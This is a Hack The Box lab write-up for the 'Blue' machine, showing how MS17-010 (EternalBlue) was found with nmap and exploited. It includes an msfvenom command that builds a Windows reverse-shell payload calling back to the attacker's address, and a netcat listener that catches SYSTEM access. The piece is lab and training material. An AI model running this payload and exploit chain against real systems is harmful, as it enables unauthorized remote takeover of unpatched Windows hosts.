Hack The Box Blue Write-Up (Using msfvenom)
1. Executive Summary
The windows-based machine is vulnerable to the infamous Eternal Blue. EternalBlue is the term given to a group of Microsoft software flaws as well as the exploit developed by the National Security Agency (NSA) as a cyberattack tool. Although the EternalBlue hack, which Microsoft has designated as MS17–010, exclusively affects Windows operating systems, anything that supports the SMBv1 (Server Message Block version 1) file-sharing protocol is technically vulnerable to ransomware and other threats.
Nmap is a tool that helps us to scan our target, so it is obligatory to use it on the enumeration phase. Below is my usual nmap command.
nmap -sV -sC -A -p- -v -oA blue 10.10.10.40
According to nmap scanning result, there are nine open ports. It was certain that there is SMB service inside the machine by seeing how there are ports 139 and 445 open. So I tried to use nmap again to enumerate if the machine is vulnerable to known vulnerabilities using the command below.
nmap -p445 — script vuln 10.10.10.40
It said that the system is vulnerable to MS17–010. MS17–010 or more known as Ethernal Blue is a vulnerability that allow attacker to perform remote code execution if the attacker transmits specially designed messages to a Microsoft Server Message Block 1.0 (SMBv1) server.
I use searchsploit to find the valid exploit from MS17–010 and decided to use this one.
To run the exploit, you need to have impacket installed under your python. I have encountered issues regarding this particular python library. My default python version is 2.7 while the impacket library that has been installed is actually under python 3.0. When I tried to run the exploit using python 3.0, it gave me lines of error. So after reading on the internet, I tried to install the impacket under my python 2.7, to be able perform that action I need to install pip version 2 since my default pip actually version 3.
Long story short, I was able to solve it, thanks to this amazing discussion forum. After all the struggle I have with impacket, I only have to upgrade the setup tools using command below.
pip install — upgrade setuptools
While troubleshooting impacket, I read the python script that we download earlier and discover that we need to put pipe name to be able running the script.
In the middle of searching way to find the valid pipe name, I discover script from https://raw.githubusercontent.com/worawit/MS17-010/master/checker.py that help us to find the valid pipe name.
On the first try, it failed. I tried to re-understand the script and found that their username and password field on the script is still empty. So I changed it into ‘vagrant’ and ‘vagrant’ which is same value as the default script of our exploit.
I tried to run checker.py again and discover some of valid pipe name.
Now that we have list of valid pipe name, we need to re-run the python script. According to this website, before trying to run the script we need to modify it.
We need to modify the def smb_pwn by attaching our payload, that we need to create using msfvenom with command below.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.8 LPORT=2222 -f exe > exploit.exe
Now that we are done with our payload, we should modify our script.
Before re-running our exploit script, we need to setup the listener using port that we defined in our payload.
nc -lnvp 2222
And run the exploit using one of pipe name that we found earlier.
Login as NT authority/system!
After successfully logged in as admin, I tried to look for user and root flag by using command in below.
Sadly, the find command did not bring me to anywhere so I do not have any choice to look for the flag manually.
This machine thankfully put their flag in the normal directory. User flag is under C:\Users\haris\Desktop while root flag is inside C:\Users\Administrator\Desktop.
What Is EternalBlue and Why Is the MS17-010 Exploit Still Relevant?
This article contains: You may be wondering who created EternalBlue in the first place? The origins of the SMB…
Offensive Security's Exploit Database Archive
usr/bin/python from impacket import smb, smbconnection from mysmb import MYSMB from struct import pack, unpack…
EternalBlue without Metasploit
In this blog post we are going to explore using exploits without Metasploit at all. I figured the best way to do that…